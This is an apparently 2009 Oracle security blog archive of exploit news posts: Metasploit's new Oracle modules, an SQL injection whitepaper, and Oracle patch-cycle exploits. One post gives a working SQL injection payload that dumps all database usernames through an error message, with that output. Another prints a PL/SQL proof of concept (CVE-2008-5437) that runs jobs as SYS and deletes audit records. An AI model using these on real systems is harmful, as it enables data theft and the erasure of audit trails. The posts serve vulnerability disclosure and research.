Archive for the ‘Exploit’ Category

Metasploit contains new Oracle exploits

Montag, März 2nd, 2009

Chris Gates wrote on his blog that Metasploit contains now exploits for Oracle bugs which were fixed in October 2008 (lt.compress) and January 2009 CPU.

Metasploit is becoming more and more useful for Oracle pentester…

New SQL Injection Whitepaper (for SQL Server)

Sonntag, Februar 8th, 2009

 Daniel Kachakil released an interesting whitepaper about fast data extraction using SQL Injection and XML statements on SQL server and a tool implementing this technique called SFX-SQLI.

The paper describes how to retrieve data from a SQL Server database using SQL Injection and XML. This technique is not new (for me). I am using such techniques in the Oracle environment via xmltransform or stragg since a while. It is possible to retrieve the entire content of a table in a single error message…

More details will be available on the SQL Injection book I am currently writing with some other security researchers…

The tool SFX-SQLI implements the concept for SQL Server.

Here is one of the examples how to export an entire table, e.g. via utl_inaddr. The output is limited to 4000 byte:

or 1= utl_inaddr.get_host_name((select xmltransform(sys_xmlagg(sys_xmlgen(username)),xmltype(‚< ?xml version=“1.0″?> ;
‚)).getstringval() listagg from all_users))–

Warning: ociexecute(): OCIStmtExecute: ORA-29257: host CUSTCOM_PROD;WEBTOOL;WEBDB;NELLDB;ERDB;B2B;BI;PM;SH;IX;OE;HR;SCOTT;MGMT_VIEW;MDDATA;SYSMAN;MDSYS;SI_INFORMTN_SCHEMA;ORDPLUGINS;ORDSYS;OLAPSYS;ANONYMOUS;XDB;CTXSYS;EXFSYS;WMSYS;DBSNMP;TSMSYS;DIP;OUTLN;SYSTEM;SYS; unknown ORA-06512: at „SYS.UTL_INADDR“, line 4 ORA-06512: at „SYS.UTL_INADDR“, line 35

Attacking Oracle with Metasploit Video published

Samstag, Februar 7th, 2009

Chris Gates has published a video where he shows how to attack Oracle with Metasploit from the Shmoocon 09 conference.

Even if the attacks were shown on an outdated version of Oracle (10.1.0.3) it’s good to see that the Oracle support in Metasploit is getting better…

Chris has an interesting blog called carnal0wnage.blogspot.com.

Proof-of-concept how to bypass Oracle Auditing using DBMS_IJOB

Freitag, Januar 16th, 2009

Here is the proof of concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA, my former colleague from Oracle Consulting Germany.

A different bug concerning Auditing reported by us is still open. Oracle Auditing alone is not sufficient because there are various ways to bypass it. . Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.

— Bypassing Oracle Auditing
— Everything executed via dbms_ijob (granted to DBAs by default)
— will not appear in the Oracle auditing
— by Volker Solinus

declare
jj    integer := 666666;    — job number
begin
sys.dbms_ijob.submit(
JOB =>        jj,
LUSER =>    ‚SYS‘,
PUSER =>    ‚SYS‘,
CUSER =>    ‚SYS‘,
NEXT_DATE =>    sysdate,
INTERVAL =>    null,
BROKEN =>    false,
WHAT =>        ‚
declare
jj    integer := ‚||jj||‘;
begin
execute immediate “alter system archive log current“;
sys.dbms_ijob.remove(jj);
delete from sys.aud$ where obj$name = “DBMS_IJOB“;
commit;
end;‘,
NLSENV =>     ‚NLS_LANGUAGE=“AMERICAN“ NLS_TERRITORY=“AMERICA“ NLS_CURRENCY=“$“ NLS_ISO_CURRENCY=“AMERICA“ NLS_NUMERIC_CHARACTERS=“.,“ NLS_DATE_FORMAT=“DD-MON-RR“ NLS_DATE_LANGUAGE=“AMERICAN“ NLS_SORT=“BINARY“‘,
ENV =>        hextoraw(‚0102000200000000‘));
sys.dbms_ijob.run(jj);
exception when others then
if sqlcode=-12011 then
sys.dbms_ijob.remove(jj);
end if;
raise;
end;
/
After applying the January CPU 2009 you will get the following error message:

ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32

First exploits (non-DB) for January 2009 CPU

Donnerstag, Januar 15th, 2009

Joxean Koret has published the first exploit for remote code execution on Oracle Secure Backup 10g. Having the name „Secure“ in the title is probably not always the smartest idea…

And an additional exploit for Oracle TimesTen from Joxean too.